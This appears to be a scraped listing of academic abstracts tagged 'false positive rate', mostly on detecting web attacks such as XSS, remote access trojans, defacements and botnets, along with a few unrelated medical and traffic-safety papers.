Security Testing Framework for Web Applications

The growth of web-based applications has increased tremendously from last two decades. While these applications bring huge benefits to society, yet they suffer from various security threats. Although there exist various techniques to ensure the security of web applications, still a large number of applications suffer from a wide variety of attacks and result in financial loses. In this article, a security-testing framework for web applications is proposed with an argument that security of an application should be tested at every stage of software development life cycle (SDLC). Security testing is initiated from the requirement engineering phase using a keyword-analysis phase. The output of the first phase serves as input to the next phase. Different case study applications indicate that the framework assists in early detection of security threats and applying appropriate security measures. The results obtained from the implementation of the proposed framework demonstrated a high detection ratio with a less false-positive rate.

Download Full-text

PRATD: A Phased Remote Access Trojan Detection Method with Double-Sided Features

Electronics ◽

10.3390/electronics9111894 ◽

2020 ◽

Vol 9 (11) ◽

pp. 1894

Author(s):

Chun Guo ◽

Zihua Song ◽

Yuan Ping ◽

Guowei Shen ◽

Yuhei Cui ◽

...

Keyword(s):

False Positive ◽

Detection Method ◽

False Positive Rate ◽

True Positive Rate ◽

Remote Access ◽

Detection Methods ◽

Security Threats ◽

True Positive ◽

Trojan Detection ◽

Positive Rate

Remote Access Trojan (RAT) is one of the most terrible security threats that organizations face today. At present, two major RAT detection methods are host-based and network-based detection methods. To complement one another’s strengths, this article proposes a phased RATs detection method by combining double-side features (PRATD). In PRATD, both host-side and network-side features are combined to build detection models, which is conducive to distinguishing the RATs from benign programs because that the RATs not only generate traffic on the network but also leave traces on the host at run time. Besides, PRATD trains two different detection models for the two runtime states of RATs for improving the True Positive Rate (TPR). The experiments on the network and host records collected from five kinds of benign programs and 20 famous RATs show that PRATD can effectively detect RATs, it can achieve a TPR as high as 93.609% with a False Positive Rate (FPR) as low as 0.407% for the known RATs, a TPR 81.928% and FPR 0.185% for the unknown RATs, which suggests it is a competitive candidate for RAT detection.

Download Full-text

Validation of the web-based LUMINA questionnaire for recruiting large cohorts of migraineurs

Cephalalgia ◽

10.1177/0333102411418846 ◽

2011 ◽

Vol 31 (13) ◽

pp. 1359-1367 ◽

Cited By ~ 32

Author(s):

WPJ van Oosterhout ◽

CM Weller ◽

AH Stam ◽

F Bakels ◽

T Stijnen ◽

...

Keyword(s):

False Positive Rate ◽

Prediction Rule ◽

Migraine Aura ◽

Genetic Studies ◽

Screening Criteria ◽

Web Based ◽

Telephone Interviews ◽

Lower Specificity ◽

Positive Rate

Objective: To assess validity of a self-administered web-based migraine-questionnaire in diagnosing migraine aura for the use of epidemiological and genetic studies. Methods: Self-reported migraineurs enrolled via the LUMINA website and completed a web-based questionnaire on headache and aura symptoms, after fulfilling screening criteria. Diagnoses were calculated using an algorithm based on the International Classification of Headache Disorders (ICHD-2), and semi-structured telephone-interviews were performed for final diagnoses. Logistic regression generated a prediction rule for aura. Algorithm-based diagnoses and predicted diagnoses were subsequently compared to the interview-derived diagnoses. Results: In 1 year, we recruited 2397 migraineurs, of which 1067 were included in the validation. A seven-question subset provided higher sensitivity (86% vs. 45%), slightly lower specificity (75% vs. 95%), and similar positive predictive value (86% vs. 88%) in assessing aura when comparing with the ICHD-2-based algorithm. Conclusions: This questionnaire is accurate and reliable in diagnosing migraine aura among self-reported migraineurs and enables detection of more aura cases with low false-positive rate.

Download Full-text

Detecting Website Defacements Based on Machine Learning Techniques and Attack Signatures

Computers ◽

10.3390/computers8020035 ◽

2019 ◽

Vol 8 (2) ◽

pp. 35 ◽

Cited By ~ 2

Author(s):

Xuan Dau Hoang ◽

Ngoc Tuong Nguyen

Keyword(s):

Machine Learning ◽

Web Applications ◽

False Positive Rate ◽

Training Data ◽

Machine Learning Techniques ◽

Web Pages ◽

Government Organizations ◽

Detection Model ◽

Learning Techniques ◽

Positive Rate

Defacement attacks have long been considered one of prime threats to websites and web applications of companies, enterprises, and government organizations. Defacement attacks can bring serious consequences to owners of websites, including immediate interruption of website operations and damage of the owner reputation, which may result in huge financial losses. Many solutions have been researched and deployed for monitoring and detection of website defacement attacks, such as those based on checksum comparison, diff comparison, DOM tree analysis, and complicated algorithms. However, some solutions only work on static websites and others demand extensive computing resources. This paper proposes a hybrid defacement detection model based on the combination of the machine learning-based detection and the signature-based detection. The machine learning-based detection first constructs a detection profile using training data of both normal and defaced web pages. Then, it uses the profile to classify monitored web pages into either normal or attacked. The machine learning-based component can effectively detect defacements for both static pages and dynamic pages. On the other hand, the signature-based detection is used to boost the model’s processing performance for common types of defacements. Extensive experiments show that our model produces an overall accuracy of more than 99.26% and a false positive rate of about 0.27%. Moreover, our model is suitable for implementation of a real-time website defacement monitoring system because it does not demand extensive computing resources.

Download Full-text

Information Theoretic XSS Attack Detection in Web Applications

International Journal of Secure Software Engineering ◽

10.4018/ijsse.2014070101 ◽

2014 ◽

Vol 5 (3) ◽

pp. 1-15 ◽

Cited By ~ 2

Author(s):

Hossain Shahriar ◽

Sarah North ◽

Wei-Chuen Chen ◽

Edward Mawangi

Keyword(s):

Web Applications ◽

False Positive Rate ◽

Attack Detection ◽

Information Theoretic ◽

Detection Techniques ◽

Security Breaches ◽

Detection Approach ◽

Leibler Divergence ◽

Positive Rate ◽

Initial Results

Cross-Site Scripting (XSS) has been ranked among the top three vulnerabilities over the last few years. XSS vulnerability allows an attacker to inject arbitrary JavaScript code that can be executed in the victim's browser to cause unwanted behaviors and security breaches. Despite the presence of many mitigation approaches, the discovery of XSS is still widespread among today's web applications. As a result, there is a need to improve existing solutions and to develop novel attack detection techniques. This paper proposes a proxy-level XSS attack detection approach based on a popular information-theoretic measure known as Kullback-Leibler Divergence (KLD). Legitimate JavaScript code present in an application should remain similar or very close to the JavaScript code present in a rendered web page. A deviation between the two can be an indication of an XSS attack. This paper applies a back-off smoothing technique to effectively detect the presence of malicious JavaScript code in response pages. The proposed approach has been applied for a number of open-source PHP web applications containing XSS vulnerabilities. The initial results show that the approach can effectively detect XSS attacks and suffer from low false positive rate through proper choice of threshold values of KLD. Further, the performance overhead has been found to be negligible.

Download Full-text

Detecting Cross-Site Scripting in Web Applications Using Fuzzy Inference System

Journal of Computer Networks and Communications ◽

10.1155/2018/8159548 ◽

2018 ◽

Vol 2018 ◽

pp. 1-10 ◽

Cited By ~ 4

Author(s):

Bakare K. Ayeni ◽

Junaidu B. Sahalu ◽

Kolawole R. Adeyanju

Keyword(s):

Web Application ◽

Web Applications ◽

Fuzzy Inference ◽

False Positive Rate ◽

Data Access ◽

Web Security ◽

Web Application Security ◽

Inference System ◽

Positive Rate ◽

Cross Site

With improvement in computing and technological advancements, web-based applications are now ubiquitous on the Internet. However, these web applications are becoming prone to vulnerabilities which have led to theft of confidential information, data loss, and denial of data access in the course of information transmission. Cross-site scripting (XSS) is a form of web security attack which involves the injection of malicious codes into web applications from untrusted sources. Interestingly, recent research studies on the web application security centre focus on attack prevention and mechanisms for secure coding; recent methods for those attacks do not only generate high false positives but also have little considerations for the users who oftentimes are the victims of malicious attacks. Motivated by this problem, this paper describes an “intelligent” tool for detecting cross-site scripting flaws in web applications. This paper describes the method implemented based on fuzzy logic to detect classic XSS weaknesses and to provide some results on experimentations. Our detection framework recorded 15% improvement in accuracy and 0.01% reduction in the false-positive rate which is considerably lower than that found in the existing work by Koli et al. Our approach also serves as a decision-making tool for the users.

Download Full-text

Developing Safety Management Tools for State Departments of Transportation

Transportation Research Record Journal of the Transportation Research Board ◽

10.3141/2364-05 ◽

2013 ◽

Vol 2364 (1) ◽

pp. 36-43

Author(s):

Koohong Chung ◽

Offer Grembek ◽

Jinwoo Lee ◽

Keechoo Choi

Keyword(s):

Traffic Safety ◽

Safety Management ◽

False Positive Rate ◽

Qualitative Description ◽

Department Of Transportation ◽

Management Tools ◽

California Department ◽

Web Based ◽

Highway Safety Manual ◽

Positive Rate

Two safety management tools have recently been developed for the California Department of Transportation (Caltrans). One is the continuous risk profile (CRP) approach, which is a network screening procedure, and the other is the California Safety Analyst (CASA), a web-based application designed to assist state safety engineers in conducting safety investigations and in documenting their findings. This paper provides a qualitative description of the two tools and summarizes feedback from more than 100 Caltrans safety engineers who attended demonstrations of the web-based application. Findings from both empirical analysis and the survey indicate that CRP can significantly reduce the false positive rate and that CASA can greatly improve the efficiency of traffic safety investigations. However, misunderstandings remain about the relationship between the CRP approach, other methods explained in the Highway Safety Manual, and different safety management tools. The misunderstandings create challenges for the deployment of CRP and CASA in California.

Download Full-text

Information Theoretic XSS Attack Detection in Web Applications

Application Development and Design ◽

10.4018/978-1-5225-3422-8.ch042 ◽

2018 ◽

pp. 972-987 ◽

Cited By ~ 1

Author(s):

Hossain Shahriar ◽

Sarah North ◽

Wei-Chuen Chen ◽

Edward Mawangi

Keyword(s):

Web Applications ◽

False Positive Rate ◽

Attack Detection ◽

Information Theoretic ◽

Detection Techniques ◽

Security Breaches ◽

Detection Approach ◽

Leibler Divergence ◽

Positive Rate ◽

Initial Results

Cross-Site Scripting (XSS) has been ranked among the top three vulnerabilities over the last few years. XSS vulnerability allows an attacker to inject arbitrary JavaScript code that can be executed in the victim's browser to cause unwanted behaviors and security breaches. Despite the presence of many mitigation approaches, the discovery of XSS is still widespread among today's web applications. As a result, there is a need to improve existing solutions and to develop novel attack detection techniques. This paper proposes a proxy-level XSS attack detection approach based on a popular information-theoretic measure known as Kullback-Leibler Divergence (KLD). Legitimate JavaScript code present in an application should remain similar or very close to the JavaScript code present in a rendered web page. A deviation between the two can be an indication of an XSS attack. This paper applies a back-off smoothing technique to effectively detect the presence of malicious JavaScript code in response pages. The proposed approach has been applied for a number of open-source PHP web applications containing XSS vulnerabilities. The initial results show that the approach can effectively detect XSS attacks and suffer from low false positive rate through proper choice of threshold values of KLD. Further, the performance overhead has been found to be negligible.

Download Full-text

Agile Development of Secure Web-Based Applications

Integrated Approaches in Information Technology and Web Engineering ◽

10.4018/978-1-60566-418-7.ch017 ◽

2009 ◽

pp. 257-277

Author(s):

A. F. Tappenden ◽

T. Huynh ◽

J. Miller ◽

A. Geras ◽

M. Smith

Keyword(s):

Open Source ◽

Security Requirements ◽

Agile Development ◽

Unit Testing ◽

The Novel ◽

Security Testing ◽

Security Risks ◽

Web Based ◽

Testing Framework ◽

Development Framework

This article outlines a four-point strategy for the development of secure Web-based applications within an agile development framework and introduces strategies to mitigate security risks that are commonly present in Web-based applications. The proposed strategy includes the representation of security requirements as test cases supported by the open source tool FIT, the deployment of a highly testable architecture allowing for security testing of the application at all levels, the outlining of an extensive security testing strategy supported by the open source unit-testing framework HTTPUnit, and the introduction of the novel technique of security refactoring that transforms insecure working code into a functionally-equivalent secure code. Today, many Web-based applications are not secure, and limited literature exists concerning the use of agile methods within this domain. It is the intention of this article to further discussions and research regarding the use of an agile methodology for the development of secure Web-based applications.

Download Full-text

Detecting Web-Based Botnets Using Bot Communication Traffic Features

Security and Communication Networks ◽

10.1155/2017/5960307 ◽

2017 ◽

Vol 2017 ◽

pp. 1-11 ◽

Cited By ~ 3

Author(s):

Fu-Hau Hsu ◽

Chih-Wen Ou ◽

Yan-Ling Hwang ◽

Ya-Ching Chang ◽

Po-Ching Lin

Keyword(s):

False Positive ◽

False Positive Rate ◽

Web Server ◽

Experimental Results ◽

Web Pages ◽

Web Based ◽

Network Equipment ◽

Positive Rate ◽

Communication Traffic ◽

And Control

Web-based botnets are popular nowadays. A Web-based botnet is a botnet whose C&C server and bots use HTTP protocol, the most universal and supported network protocol, to communicate with each other. Because the botnet communication can be hidden easily by attackers behind the relatively massive HTTP traffic, administrators of network equipment, such as routers and switches, cannot block such suspicious traffic directly regardless of costs. Based on the clients constituent of a Web server and characteristics of HTTP responses sent to clients from the server, this paper proposes a traffic inspection solution, called Web-based Botnet Detector (WBD). WBD is able to detect suspicious C&C (Command-and-Control) servers of HTTP botnets regardless of whether the botnet commands are encrypted or hidden in normal Web pages. More than 500 GB real network traces collected from 11 backbone routers are used to evaluate our method. Experimental results show that the false positive rate of WBD is 0.42%.

Download Full-text